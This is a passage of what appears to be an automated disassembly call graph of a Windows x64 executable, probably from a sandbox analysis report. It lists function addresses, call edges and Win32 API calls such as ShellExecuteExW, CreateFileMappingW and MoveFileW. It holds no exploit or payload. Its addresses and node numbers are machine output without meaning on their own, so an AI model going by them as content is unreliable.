21719 7ff7f4d7f723 21714->21719 21720 7ff7f4d7f700 GetWindowLongPtrW SetWindowLongPtrW 21714->21720 22126 7ff7f4d7e664 33 API calls _handle_error 21716->22126 21735 7ff7f4d61c80 33 API calls 21717->21735 21722 7ff7f4d7fff0 21718->21722 21938 7ff7f4d80998 21719->21938 21720->21719 21721 7ff7f4d7f5ba 21727 7ff7f4d61b70 31 API calls 21721->21727 21729 7ff7f4d6210c SetDlgItemTextW 21722->21729 21734 7ff7f4d7f5c5 21727->21734 21728->21678 21728->21702 21736 7ff7f4d80004 21729->21736 21730 7ff7f4d7f38a 22127 7ff7f4d7e664 33 API calls _handle_error 21730->22127 21731 7ff7f4d7f205 GetLastError 21732 7ff7f4d7f214 21731->21732 21738 7ff7f4d6424c 100 API calls 21732->21738 21740 7ff7f4d61b70 31 API calls 21734->21740 21735->21716 21745 7ff7f4d80036 SendDlgItemMessageW FindFirstFileW 21736->21745 21742 7ff7f4d7f221 21738->21742 21739 7ff7f4d80998 185 API calls 21743 7ff7f4d7f74c 21739->21743 21744 7ff7f4d7f5d3 21740->21744 21741 7ff7f4d7f39b 22128 7ff7f4d7e664 33 API calls _handle_error 21741->22128 21747 7ff7f4d61b70 31 API calls 21742->21747 22088 7ff7f4d83484 21743->22088 21756 7ff7f4d6aee0 48 API calls 21744->21756 21749 7ff7f4d8008b 21745->21749 21753 7ff7f4d80514 21745->21753 21747->21660 21760 7ff7f4d6aee0 48 API calls 21749->21760 21750 7ff7f4d7f3ac 22129 7ff7f4d6bd2c 131 API calls 21750->22129 21753->21678 21754 7ff7f4d80591 21753->21754 21758 7ff7f4d805b9 21753->21758 21803 7ff7f4d805d6 21753->21803 21754->21678 21755 7ff7f4d80998 185 API calls 21771 7ff7f4d7f77a 21755->21771 21759 7ff7f4d7f5eb 21756->21759 21757 7ff7f4d7f3c3 22130 7ff7f4d836a0 33 API calls 21757->22130 21762 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21758->21762 21772 7ff7f4d612bc 33 API calls 21759->21772 21764 7ff7f4d800ae 21760->21764 21768 7ff7f4d805be 21762->21768 21763 7ff7f4d7f7a6 22096 7ff7f4d61e98 GetDlgItem EnableWindow 21763->22096 21773 7ff7f4d612bc 33 API calls 21764->21773 21765 7ff7f4d7f3e2 CreateFileMappingW 21766 7ff7f4d7f463 ShellExecuteExW 21765->21766 21767 7ff7f4d7f421 MapViewOfFile 21765->21767 21788 7ff7f4d7f484 21766->21788 22131 7ff7f4d86dd0 21767->22131 21774 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21768->21774 21771->21763 21775 7ff7f4d80998 185 API calls 21771->21775 21782 7ff7f4d7f614 21772->21782 21776 7ff7f4d800dd 21773->21776 21777 7ff7f4d805c4 21774->21777 21775->21763 22144 7ff7f4d61170 33 API calls memcpy_s 21776->22144 21781 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21777->21781 21779 7ff7f4d800f8 22145 7ff7f4d652c0 33 API calls 2 library calls 21779->22145 21780 7ff7f4d7f4d3 21789 7ff7f4d7f4ec UnmapViewOfFile CloseHandle 21780->21789 21790 7ff7f4d7f4ff 21780->21790 21785 7ff7f4d805ca 21781->21785 21782->21630 21783 7ff7f4d7f66a 21782->21783 21786 7ff7f4d61b70 31 API calls 21783->21786 21793 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21785->21793 21786->21675 21787 7ff7f4d8010f 21791 7ff7f4d61b70 31 API calls 21787->21791 21788->21780 21795 7ff7f4d7f4c1 Sleep 21788->21795 21789->21790 21790->21605 21792 7ff7f4d7f535 21790->21792 21794 7ff7f4d8011c 21791->21794 21797 7ff7f4d61b70 31 API calls 21792->21797 21796 7ff7f4d805d0 21793->21796 21794->21768 21799 7ff7f4d61b70 31 API calls 21794->21799 21795->21780 21795->21788 21800 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21796->21800 21798 7ff7f4d7f552 21797->21798 21801 7ff7f4d61b70 31 API calls 21798->21801 21802 7ff7f4d80183 21799->21802 21800->21803 21801->21667 21804 7ff7f4d6210c SetDlgItemTextW 21802->21804 21806 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21803->21806 21805 7ff7f4d80197 FindClose 21804->21805 21807 7ff7f4d802a7 SendDlgItemMessageW 21805->21807 21808 7ff7f4d801b3 21805->21808 21809 7ff7f4d805dc 21806->21809 21810 7ff7f4d802db 21807->21810 22146 7ff7f4d7de04 10 API calls _handle_error 21808->22146 21813 7ff7f4d6aee0 48 API calls 21810->21813 21812 7ff7f4d801d6 21814 7ff7f4d6aee0 48 API calls 21812->21814 21815 7ff7f4d802e8 21813->21815 21816 7ff7f4d801df 21814->21816 21818 7ff7f4d612bc 33 API calls 21815->21818 21817 7ff7f4d6d9c0 48 API calls 21816->21817 21823 7ff7f4d801fc memcpy_s 21817->21823 21820 7ff7f4d80317 21818->21820 21819 7ff7f4d61b70 31 API calls 21821 7ff7f4d80293 21819->21821 22147 7ff7f4d61170 33 API calls memcpy_s 21820->22147 21824 7ff7f4d6210c SetDlgItemTextW 21821->21824 21823->21777 21823->21819 21824->21807 21825 7ff7f4d80332 22148 7ff7f4d652c0 33 API calls 2 library calls 21825->22148 21827 7ff7f4d80349 21828 7ff7f4d61b70 31 API calls 21827->21828 21829 7ff7f4d80355 memcpy_s 21828->21829 21830 7ff7f4d61b70 31 API calls 21829->21830 21831 7ff7f4d8038f 21830->21831 21832 7ff7f4d61b70 31 API calls 21831->21832 21833 7ff7f4d8039c 21832->21833 21833->21785 21834 7ff7f4d61b70 31 API calls 21833->21834 21835 7ff7f4d80403 21834->21835 21836 7ff7f4d6210c SetDlgItemTextW 21835->21836 21837 7ff7f4d80417 21836->21837 21837->21753 22149 7ff7f4d7de04 10 API calls _handle_error 21837->22149 21839 7ff7f4d80442 21840 7ff7f4d6aee0 48 API calls 21839->21840 21841 7ff7f4d8044c 21840->21841 21842 7ff7f4d6d9c0 48 API calls 21841->21842 21844 7ff7f4d80469 memcpy_s 21842->21844 21843 7ff7f4d61b70 31 API calls 21845 7ff7f4d80500 21843->21845 21844->21796 21844->21843 21846 7ff7f4d6210c SetDlgItemTextW 21845->21846 21846->21753 21848 7ff7f4d621d0 21847->21848 21849 7ff7f4d6216a 21847->21849 21848->21506 21849->21848 22150 7ff7f4d6a8ac 21849->22150 21851 7ff7f4d6218f 21851->21848 21852 7ff7f4d621a4 GetDlgItem 21851->21852 21852->21848 21853 7ff7f4d621b7 21852->21853 21853->21848 21854 7ff7f4d621be SetDlgItemTextW 21853->21854 21854->21848 21856 7ff7f4d61efc 21855->21856 21857 7ff7f4d61f34 21855->21857 21859 7ff7f4d612bc 33 API calls 21856->21859 22199 7ff7f4d61ff8 GetWindowTextLengthW 21857->22199 21860 7ff7f4d61f2a memcpy_s 21859->21860 21861 7ff7f4d61b70 31 API calls 21860->21861 21864 7ff7f4d61f89 21860->21864 21861->21864 21862 7ff7f4d85bf0 _handle_error 8 API calls 21865 7ff7f4d61fdd 21862->21865 21863 7ff7f4d61fc8 21863->21862 21864->21863 21866 7ff7f4d61ff0 21864->21866 21865->21534 21865->21535 21865->21675 21867 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21866->21867 21868 7ff7f4d61ff5 21867->21868 21873 7ff7f4d82ac0 21869->21873 21870 7ff7f4d82ae7 21871 7ff7f4d85bf0 _handle_error 8 API calls 21870->21871 21872 7ff7f4d7f047 21871->21872 21872->21570 21873->21870 21874 7ff7f4d66e5c 33 API calls 21873->21874 21875 7ff7f4d82b3a 21874->21875 22211 7ff7f4d61170 33 API calls memcpy_s 21875->22211 21877 7ff7f4d82b4f 21878 7ff7f4d61b70 31 API calls 21877->21878 21881 7ff7f4d82b5f memcpy_s 21877->21881 21878->21881 21879 7ff7f4d61b70 31 API calls 21880 7ff7f4d82b86 21879->21880 21882 7ff7f4d61b70 31 API calls 21880->21882 21881->21879 21882->21870 22212 7ff7f4d7e92c PeekMessageW 21883->22212 21886 7ff7f4d82c05 21890 7ff7f4d82c11 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 21886->21890 21887 7ff7f4d82c53 IsDlgButtonChecked IsDlgButtonChecked 21888 7ff7f4d82c99 21887->21888 21889 7ff7f4d82cb4 IsDlgButtonChecked 21887->21889 21888->21889 21891 7ff7f4d82cd6 IsDlgButtonChecked IsDlgButtonChecked 21889->21891 21892 7ff7f4d82cd3 21889->21892 21890->21887 21893 7ff7f4d82d28 IsDlgButtonChecked 21891->21893 21894 7ff7f4d82d03 IsDlgButtonChecked 21891->21894 21892->21891 21895 7ff7f4d85bf0 _handle_error 8 API calls 21893->21895 21894->21893 21896 7ff7f4d7f088 21895->21896 21896->21608 21903 7ff7f4d65671 21897->21903 21905 7ff7f4d65562 21897->21905 21898 7ff7f4d85bf0 _handle_error 8 API calls 21899 7ff7f4d65687 21898->21899 21899->21634 21899->21635 21900 7ff7f4d6564b 21901 7ff7f4d65c60 56 API calls 21900->21901 21900->21903 21901->21903 21902 7ff7f4d612bc 33 API calls 21902->21905 21903->21898 21905->21900 21905->21902 21906 7ff7f4d6569c 21905->21906 22217 7ff7f4d65c60 21905->22217 21907 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21906->21907 21908 7ff7f4d656a1 21907->21908 21910 7ff7f4d68d06 SetCurrentDirectoryW 21909->21910 21911 7ff7f4d68d03 21909->21911 21910->21650 21911->21910 21913 7ff7f4d65265 21912->21913 21914 7ff7f4d6527a 21913->21914 21915 7ff7f4d612bc 33 API calls 21913->21915 21916 7ff7f4d85bf0 _handle_error 8 API calls 21914->21916 21915->21914 21917 7ff7f4d652b1 21916->21917 21918 7ff7f4d7d17c 21917->21918 21919 7ff7f4d7d1a3 21918->21919 22251 7ff7f4d660e0 21919->22251 21921 7ff7f4d7d1b3 memcpy_s 21921->21690 21924 7ff7f4d6436a 21922->21924 21923 7ff7f4d6439e 21926 7ff7f4d6447f 21923->21926 21928 7ff7f4d680b0 49 API calls 21923->21928 21924->21923 21925 7ff7f4d643b1 CreateFileW 21924->21925 21925->21923 21927 7ff7f4d644af 21926->21927 21933 7ff7f4d61c80 33 API calls 21926->21933 21929 7ff7f4d85bf0 _handle_error 8 API calls 21927->21929 21930 7ff7f4d64409 21928->21930 21934 7ff7f4d644c4 21929->21934 21931 7ff7f4d6440d CreateFileW 21930->21931 21932 7ff7f4d64446 21930->21932 21931->21932 21932->21926 21935 7ff7f4d644d8 21932->21935 21933->21927 21934->21731 21934->21732 21936 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21935->21936 21937 7ff7f4d644dd 21936->21937 22260 7ff7f4d7e518 21938->22260 21940 7ff7f4d80cfe 21941 7ff7f4d61b70 31 API calls 21940->21941 21942 7ff7f4d80d07 21941->21942 21943 7ff7f4d85bf0 _handle_error 8 API calls 21942->21943 21945 7ff7f4d7f73b 21943->21945 21944 7ff7f4d6d120 33 API calls 22072 7ff7f4d80a13 memcpy_s 21944->22072 21945->21739 21946 7ff7f4d82a0a 22381 7ff7f4d6353c 47 API calls 21946->22381 21949 7ff7f4d82a10 22382 7ff7f4d6353c 47 API calls 21949->22382 21951 7ff7f4d829fe 21954 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21951->21954 21952 7ff7f4d82a16 21956 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21952->21956 21955 7ff7f4d82a04 21954->21955 22380 7ff7f4d6353c 47 API calls 21955->22380 21958 7ff7f4d82a1c 21956->21958 21960 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21958->21960 21961 7ff7f4d82a22 21960->21961 21966 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21961->21966 21962 7ff7f4d8295a 21963 7ff7f4d829e2 21962->21963 21967 7ff7f4d61c80 33 API calls 21962->21967 22378 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 21963->22378 21964 7ff7f4d613c4 33 API calls 21968 7ff7f4d8174a GetTempPathW 21964->21968 21965 7ff7f4d829f8 22379 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 21965->22379 21969 7ff7f4d82a28 21966->21969 21972 7ff7f4d82987 21967->21972 21968->22072 21977 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21969->21977 21970 7ff7f4d67a28 35 API calls 21970->22072 22377 7ff7f4d7e6f8 33 API calls 3 library calls 21972->22377 21975 7ff7f4d8299d 21983 7ff7f4d61b70 31 API calls 21975->21983 21986 7ff7f4d829b4 memcpy_s 21975->21986 21976 7ff7f4d62120 SetDlgItemTextW 21976->22072 21981 7ff7f4d82a2e 21977->21981 21978 7ff7f4d688f8 33 API calls 21978->22072 21979 7ff7f4d8f054 43 API calls 21979->22072 21987 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21981->21987 21983->21986 21984 7ff7f4d61b70 31 API calls 21984->21963 21985 7ff7f4d82303 21985->21963 21985->21965 21988 7ff7f4d85aa0 4 API calls 21985->21988 21996 7ff7f4d8234b memcpy_s 21985->21996 21986->21984 21989 7ff7f4d82a34 21987->21989 21988->21996 21995 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21989->21995 21991 7ff7f4d7e518 33 API calls 21991->22072 21992 7ff7f4d82a7c 22385 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 21992->22385 21993 7ff7f4d61c80 33 API calls 21993->22072 21994 7ff7f4d82a88 22387 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 21994->22387 21999 7ff7f4d82a3a 21995->21999 22004 7ff7f4d61c80 33 API calls 21996->22004 22046 7ff7f4d8269f 21996->22046 21998 7ff7f4d61b70 31 API calls 21998->21962 22011 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21999->22011 22000 7ff7f4d82a82 22386 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 22000->22386 22002 7ff7f4d66dd8 33 API calls 22002->22072 22003 7ff7f4d82a76 22384 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 22003->22384 22012 7ff7f4d82473 22004->22012 22007 7ff7f4d61b70 31 API calls 22007->22072 22008 7ff7f4d82850 22008->21994 22008->22000 22023 7ff7f4d8284b memcpy_s 22008->22023 22028 7ff7f4d85aa0 4 API calls 22008->22028 22010 7ff7f4d8273a 22010->21992 22010->22003 22018 7ff7f4d82782 memcpy_s 22010->22018 22010->22023 22025 7ff7f4d85aa0 4 API calls 22010->22025 22015 7ff7f4d82a40 22011->22015 22017 7ff7f4d82a70 22012->22017 22024 7ff7f4d612bc 33 API calls 22012->22024 22029 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22015->22029 22016 7ff7f4d65ff4 51 API calls 22016->22072 22383 7ff7f4d6353c 47 API calls 22017->22383 22303 7ff7f4d82ff0 22018->22303 22020 7ff7f4d810f9 GetDlgItem 22026 7ff7f4d62120 SetDlgItemTextW 22020->22026 22023->21998 22030 7ff7f4d824b6 22024->22030 22025->22018 22031 7ff7f4d81118 IsDlgButtonChecked 22026->22031 22028->22023 22035 7ff7f4d82a46 22029->22035 22373 7ff7f4d6d120 22030->22373 22031->22072 22032 7ff7f4d6db54 33 API calls 22032->22072 22033 7ff7f4d65890 51 API calls 22033->22072 22034 7ff7f4d62274 31 API calls 22034->22072 22039 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22035->22039 22038 7ff7f4d672ac 53 API calls 22038->22072 22044 7ff7f4d82a4c 22039->22044 22040 7ff7f4d8114c IsDlgButtonChecked 22040->22072 22043 7ff7f4d662f0 54 API calls 22043->22072 22047 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22044->22047 22046->22008 22046->22010 22050 7ff7f4d82a64 22046->22050 22051 7ff7f4d82a6a 22046->22051 22053 7ff7f4d82a52 22047->22053 22048 7ff7f4d6885c 8 API calls 22048->22072 22049 7ff7f4d612bc 33 API calls 22074 7ff7f4d824e1 22049->22074 22052 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22050->22052 22054 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22051->22054 22052->22051 22057 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22053->22057 22054->22017 22055 7ff7f4d65238 33 API calls 22055->22072 22059 7ff7f4d82a58 22057->22059 22058 7ff7f4d6587c 51 API calls 22058->22072 22062 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22059->22062 22060 7ff7f4d671f4 33 API calls 22060->22072 22061 7ff7f4d652c0 33 API calls 22061->22072 22063 7ff7f4d82a5e 22062->22063 22068 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22063->22068 22064 7ff7f4d6210c SetDlgItemTextW 22064->22072 22066 7ff7f4d68b28 47 API calls 22066->22072 22068->22050 22069 7ff7f4d7d698 31 API calls 22069->22072 22071 7ff7f4d61b70 31 API calls 22071->22074 22072->21940 22072->21944 22072->21946 22072->21949 22072->21951 22072->21952 22072->21955 22072->21958 22072->21961 22072->21962 22072->21964 22072->21969 22072->21970 22072->21976 22072->21978 22072->21979 22072->21981 22072->21985 22072->21989 22072->21991 22072->21993 22072->21999 22072->22002 22072->22007 22072->22015 22072->22016 22072->22032 22072->22033 22072->22034 22072->22035 22072->22038 22072->22040 22072->22043 22072->22044 22072->22048 22072->22053 22072->22055 22072->22058 22072->22060 22072->22061 22072->22064 22072->22066 22072->22069 22076 7ff7f4d81aa9 EndDialog 22072->22076 22079 7ff7f4d81631 MoveFileW 22072->22079 22083 7ff7f4d6552c 56 API calls 22072->22083 22084 7ff7f4d61c04 33 API calls 22072->22084 22085 7ff7f4d62314 33 API calls 22072->22085 22087 7ff7f4d612bc 33 API calls 22072->22087 22264 7ff7f4d70a5c CompareStringW 22072->22264 22265 7ff7f4d7df44 22072->22265 22341 7ff7f4d6ce98 35 API calls _invalid_parameter_noinfo_noreturn 22072->22341 22342 7ff7f4d7d22c 33 API calls Concurrency::cancel_current_task 22072->22342 22343 7ff7f4d83efc 31 API calls _invalid_parameter_noinfo_noreturn 22072->22343 22344 7ff7f4d68ebc 47 API calls memcpy_s 22072->22344 22345 7ff7f4d7e344 33 API calls _invalid_parameter_noinfo_noreturn 22072->22345 22346 7ff7f4d7d114 33 API calls 22072->22346 22347 7ff7f4d7e6f8 33 API calls 3 library calls 22072->22347 22348 7ff7f4d66448 33 API calls 22072->22348 22349 7ff7f4d67d6c 33 API calls 3 library calls 22072->22349 22350 7ff7f4d61734 33 API calls 4 library calls 22072->22350 22351 7ff7f4d65790 22072->22351 22365 7ff7f4d61170 33 API calls memcpy_s 22072->22365 22366 7ff7f4d66260 FindClose 22072->22366 22367 7ff7f4d70a8c CompareStringW 22072->22367 22368 7ff7f4d7d808 47 API calls 22072->22368 22369 7ff7f4d7c3d4 51 API calls 3 library calls 22072->22369 22370 7ff7f4d7e664 33 API calls _handle_error 22072->22370 22371 7ff7f4d67254 CompareStringW 22072->22371 22372 7ff7f4d68be4 47 API calls 22072->22372 22074->22046 22074->22049 22074->22059 22074->22063 22074->22071 22075 7ff7f4d70a5c CompareStringW 22074->22075 22078 7ff7f4d6d120 33 API calls 22074->22078 22075->22074 22076->22072 22078->22074 22080 7ff7f4d81665 MoveFileExW 22079->22080 22081 7ff7f4d81680 22079->22081 22080->22081 22081->22072 22082 7ff7f4d61b70 31 API calls 22081->22082 22082->22081 22083->22072 22084->22072 22085->22072 22087->22072 22089 7ff7f4d8349d 22088->22089 22090 7ff7f4d61c80 33 API calls 22089->22090 22091 7ff7f4d834b3 22090->22091 22092 7ff7f4d834e8 22091->22092 22093 7ff7f4d61c80 33 API calls 22091->22093 22396 7ff7f4d79a30 22092->22396 22093->22092 22098 7ff7f4d7c0ec 4 API calls 22097->22098 22099 7ff7f4d82ecf 22098->22099 22100 7ff7f4d82fc7 22099->22100 22101 7ff7f4d82ed7 GetWindow 22099->22101 22102 7ff7f4d85bf0 _handle_error 8 API calls 22100->22102 22106 7ff7f4d82ef2 22101->22106 22103 7ff7f4d7f9ab 22102->22103 22103->21513 22103->21514 22104 7ff7f4d82efe GetClassNameW 22715 7ff7f4d70a5c CompareStringW 22104->22715 22106->22100 22106->22104 22107 7ff7f4d82f27 GetWindowLongPtrW 22106->22107 22108 7ff7f4d82fa6 GetWindow 22106->22108 22107->22108 22109 7ff7f4d82f39 IsDlgButtonChecked 22107->22109 22108->22100 22108->22106 22109->22108 22110 7ff7f4d82f55 GetObjectW 22109->22110 22716 7ff7f4d7c154 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22110->22716 22112 7ff7f4d82f71 22113 7ff7f4d7c11c 4 API calls 22112->22113 22717 7ff7f4d7c9f0 16 API calls _handle_error 22112->22717 22113->22112 22115 7ff7f4d82f89 IsDlgButtonChecked DeleteObject 22115->22108 22117 7ff7f4d62127 22116->22117 22118 7ff7f4d6212a SetDlgItemTextW 22116->22118 22117->22118 22119->21541 22120->21601 22122 7ff7f4d65890 51 API calls 22121->22122 22123 7ff7f4d65885 22122->22123 22123->21614 22123->21639 22124->21614 22125->21695 22126->21730 22127->21741 22128->21750 22129->21757 22130->21765 22132 7ff7f4d86db0 22131->22132 22132->21766 22134 7ff7f4d66e7c 22133->22134 22135 7ff7f4d66ed6 22134->22135 22136 7ff7f4d66e95 22134->22136 22718 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 22135->22718 22138 7ff7f4d67050 4 API calls 22136->22138 22140 7ff7f4d66ec3 22138->22140 22141 7ff7f4d61170 33 API calls memcpy_s 22140->22141 22141->21698 22142->21721 22143->21652 22144->21779 22145->21787 22146->21812 22147->21825 22148->21827 22149->21839 22151 7ff7f4d661e8 swprintf 46 API calls 22150->22151 22152 7ff7f4d6a909 22151->22152 22153 7ff7f4d70644 WideCharToMultiByte 22152->22153 22155 7ff7f4d6a919 22153->22155 22154 7ff7f4d6a989 22175 7ff7f4d69808 22154->22175 22155->22154 22166 7ff7f4d69c00 31 API calls 22155->22166 22172 7ff7f4d6a96a SetDlgItemTextW 22155->22172 22158 7ff7f4d6aa03 22161 7ff7f4d6aa0c GetWindowLongPtrW 22158->22161 22162 7ff7f4d6aac2 22158->22162 22159 7ff7f4d6aaf2 GetSystemMetrics GetWindow 22160 7ff7f4d6ac21 22159->22160 22173 7ff7f4d6ab1d 22159->22173 22163 7ff7f4d85bf0 _handle_error 8 API calls 22160->22163 22164 7ff7f4dcf270 22161->22164 22190 7ff7f4d699a8 22162->22190 22167 7ff7f4d6ac30 22163->22167 22168 7ff7f4d6aaaa GetWindowRect 22164->22168 22166->22155 22167->21851 22168->22162 22170 7ff7f4d6ab3e GetWindowRect 22170->22173 22171 7ff7f4d6aae5 SetDlgItemTextW 22171->22159 22172->22155 22173->22160 22173->22170 22174 7ff7f4d6ac00 GetWindow 22173->22174 22174->22160 22174->22173 22176 7ff7f4d699a8 47 API calls 22175->22176 22179 7ff7f4d6984f 22176->22179 22177 7ff7f4d85bf0 _handle_error 8 API calls 22178 7ff7f4d6998e GetWindowRect GetClientRect 22177->22178 22178->22158 22178->22159 22180 7ff7f4d612bc 33 API calls 22179->22180 22188 7ff7f4d6995a 22179->22188 22181 7ff7f4d6989c 22180->22181 22182 7ff7f4d699a1 22181->22182 22183 7ff7f4d612bc 33 API calls 22181->22183 22184 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22182->22184 22186 7ff7f4d69914 22183->22186 22185 7ff7f4d699a7 22184->22185 22187 7ff7f4d6999c 22186->22187 22186->22188 22189 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22187->22189 22188->22177 22189->22182 22191 7ff7f4d661e8 swprintf 46 API calls 22190->22191 22192 7ff7f4d699eb 22191->22192 22193 7ff7f4d70644 WideCharToMultiByte 22192->22193 22194 7ff7f4d69a03 22193->22194 22195 7ff7f4d69c00 31 API calls 22194->22195 22196 7ff7f4d69a1b 22195->22196 22197 7ff7f4d85bf0 _handle_error 8 API calls 22196->22197 22198 7ff7f4d69a2b 22197->22198 22198->22159 22198->22171 22200 7ff7f4d613c4 33 API calls 22199->22200 22201 7ff7f4d62062 GetWindowTextW 22200->22201 22202 7ff7f4d62094 22201->22202 22203 7ff7f4d612bc 33 API calls 22202->22203 22204 7ff7f4d620a2 22203->22204 22205 7ff7f4d620dd 22204->22205 22207 7ff7f4d62105 22204->22207 22206 7ff7f4d85bf0 _handle_error 8 API calls 22205->22206 22208 7ff7f4d620f3 22206->22208 22209 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22207->22209 22208->21860 22210 7ff7f4d6210a 22209->22210 22211->21877 22213 7ff7f4d7e94c GetMessageW 22212->22213 22214 7ff7f4d7e990 GetDlgItem 22212->22214 22215 7ff7f4d7e96b IsDialogMessageW 22213->22215 22216 7ff7f4d7e97a TranslateMessage DispatchMessageW 22213->22216 22214->21886 22214->21887 22215->22214 22215->22216 22216->22214 22219 7ff7f4d65c8f 22217->22219 22218 7ff7f4d65cbc 22221 7ff7f4d65890 51 API calls 22218->22221 22219->22218 22220 7ff7f4d65ca8 CreateDirectoryW 22219->22220 22220->22218 22222 7ff7f4d65d59 22220->22222 22223 7ff7f4d65cca 22221->22223 22224 7ff7f4d65d69 22222->22224 22237 7ff7f4d65ff4 22222->22237 22225 7ff7f4d65d6d GetLastError 22223->22225 22227 7ff7f4d680b0 49 API calls 22223->22227 22228 7ff7f4d85bf0 _handle_error 8 API calls 22224->22228 22225->22224 22229 7ff7f4d65cf8 22227->22229 22230 7ff7f4d65d95 22228->22230 22231 7ff7f4d65cfc CreateDirectoryW 22229->22231 22232 7ff7f4d65d17 22229->22232 22230->21905 22231->22232 22233 7ff7f4d65d50 22232->22233 22234 7ff7f4d65daa 22232->22234 22233->22222 22233->22225 22235 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22234->22235 22236 7ff7f4d65daf 22235->22236 22238 7ff7f4d6601b 22237->22238 22239 7ff7f4d6601e SetFileAttributesW 22237->22239 22238->22239 22240 7ff7f4d660b5 22239->22240 22241 7ff7f4d66034 22239->22241 22242 7ff7f4d85bf0 _handle_error 8 API calls 22240->22242 22243 7ff7f4d680b0 49 API calls 22241->22243 22244 7ff7f4d660ca 22242->22244 22245 7ff7f4d66059 22243->22245 22244->22224 22246 7ff7f4d6607c 22245->22246 22247 7ff7f4d6605d SetFileAttributesW 22245->22247 22246->22240 22248 7ff7f4d660da 22246->22248 22247->22246 22249 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22248->22249 22250 7ff7f4d660df 22249->22250 22252 7ff7f4d661da 22251->22252 22253 7ff7f4d6610f 22251->22253 22259 7ff7f4d6353c 47 API calls 22252->22259 22257 7ff7f4d6611f memcpy_s 22253->22257 22258 7ff7f4d65004 33 API calls 2 library calls 22253->22258 22257->21921 22258->22257 22261 7ff7f4d7e53f 22260->22261 22262 7ff7f4d7e546 22260->22262 22261->22072 22262->22261 22388 7ff7f4d61734 33 API calls 4 library calls 22262->22388 22264->22072 22266 7ff7f4d7df83 22265->22266 22267 7ff7f4d7e20a 22265->22267 22389 7ff7f4d80908 33 API calls 22266->22389 22269 7ff7f4d85bf0 _handle_error 8 API calls 22267->22269 22271 7ff7f4d7e21b 22269->22271 22270 7ff7f4d7dfa2 22272 7ff7f4d612bc 33 API calls 22270->22272 22271->22020 22273 7ff7f4d7dfe2 22272->22273 22274 7ff7f4d612bc 33 API calls 22273->22274 22275 7ff7f4d7e01b 22274->22275 22276 7ff7f4d612bc 33 API calls 22275->22276 22277 7ff7f4d7e04e 22276->22277 22390 7ff7f4d7e344 33 API calls _invalid_parameter_noinfo_noreturn 22277->22390 22279 7ff7f4d7e238 22280 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22279->22280 22281 7ff7f4d7e23e 22280->22281 22282 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22281->22282 22283 7ff7f4d7e244 22282->22283 22285 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22283->22285 22284 7ff7f4d7e077 22284->22279 22284->22281 22284->22283 22286 7ff7f4d61c80 33 API calls 22284->22286 22288 7ff7f4d7e189 22284->22288 22287 7ff7f4d7e24a 22285->22287 22286->22288 22290 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22287->22290 22288->22267 22288->22287 22289 7ff7f4d7e233 22288->22289 22292 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22289->22292 22291 7ff7f4d7e250 22290->22291 22293 7ff7f4d6215c 61 API calls 22291->22293 22292->22279 22294 7ff7f4d7e2a5 22293->22294 22295 7ff7f4d7e2c1 22294->22295 22296 7ff7f4d7e311 SetDlgItemTextW 22294->22296 22300 7ff7f4d7e2b1 22294->22300 22297 7ff7f4d85bf0 _handle_error 8 API calls 22295->22297 22296->22295 22298 7ff7f4d7e337 22297->22298 22298->22020 22299 7ff7f4d7e2bd 22299->22295 22301 7ff7f4d7e2c7 EndDialog 22299->22301 22300->22295 22300->22299 22391 7ff7f4d6be78 131 API calls shared_ptr 22300->22391 22301->22295 22304 7ff7f4d8338d 22303->22304 22310 7ff7f4d83039 memcpy_s 22303->22310 22305 7ff7f4d61b70 31 API calls 22304->22305 22306 7ff7f4d833ac 22305->22306 22307 7ff7f4d85bf0 